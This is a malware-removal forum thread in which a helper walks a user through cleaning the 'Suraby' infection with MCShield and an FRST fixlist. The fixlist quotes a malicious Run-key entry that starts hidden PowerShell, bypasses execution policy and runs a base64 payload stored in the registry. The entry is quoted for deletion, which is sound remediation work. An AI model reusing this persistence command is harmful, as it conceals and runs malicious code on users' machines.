Suraby virus

My laptop has been infected by the Suraby virus.

I have attached the scan log of the Malware Removal tool and the FRST and Additions files from Farbar.

Please assist me in removing it.

Are you using a USB stick / removable drive?

I see from the Malwarebytes log that it detected/quarantined an autorun worm, so you may have an infected removable drive.

You need to clean the USB drive.

Download MCShield to your desktop and install it.
It will initially run a scan and show the result as a toaster by the system clock.
Then in the control centre select scanner and tick "unhide items on flash drives".

https://dl.dropbox.com/u/73555776/mcshield%20unhide.JPG

Plug in the drive and MCShield will start a scan

Then get the log which will be located under the logs tab on the main page

And post that

THEN

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKLM\...\Winlogon: [LegalNoticeCaption] 81u3f4nt45y - 24.01.2007 - Surabaya
HKLM\...\Winlogon: [LegalNoticeText] Surabaya in my birthday Don't kill me, i'm just send message from your computer Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0
HKU\S-1-5-21-3895822533-1409361123-1344483373-1000\...\Run: [{649819E0-CB91-4974-9473-D62E987C6E63}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\OVTAFOJGFKSB').LXSUHDOFY)));
Toolbar: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
2015-10-05 06:08 - 2015-11-01 12:09 - 00000000 ____D C:\Users\user\AppData\Local\{FEC6C89A-DA6E-A422-B7F6-81CA939E7D52}
2009-07-14 05:01 - 2009-07-14 06:44 - 104460288 ___SH () C:\ProgramData\msxicnz.exe
CustomCLSID: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000_Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\localserver32 -> C:\Users\user\AppData\Local\Chromium\Application\46.0.2480.0\delegate_execute.exe (The Chromium Authors) <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader.dll ()
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Could you please zip the folder C:\FRST and upload it to a sharing site for me to collect?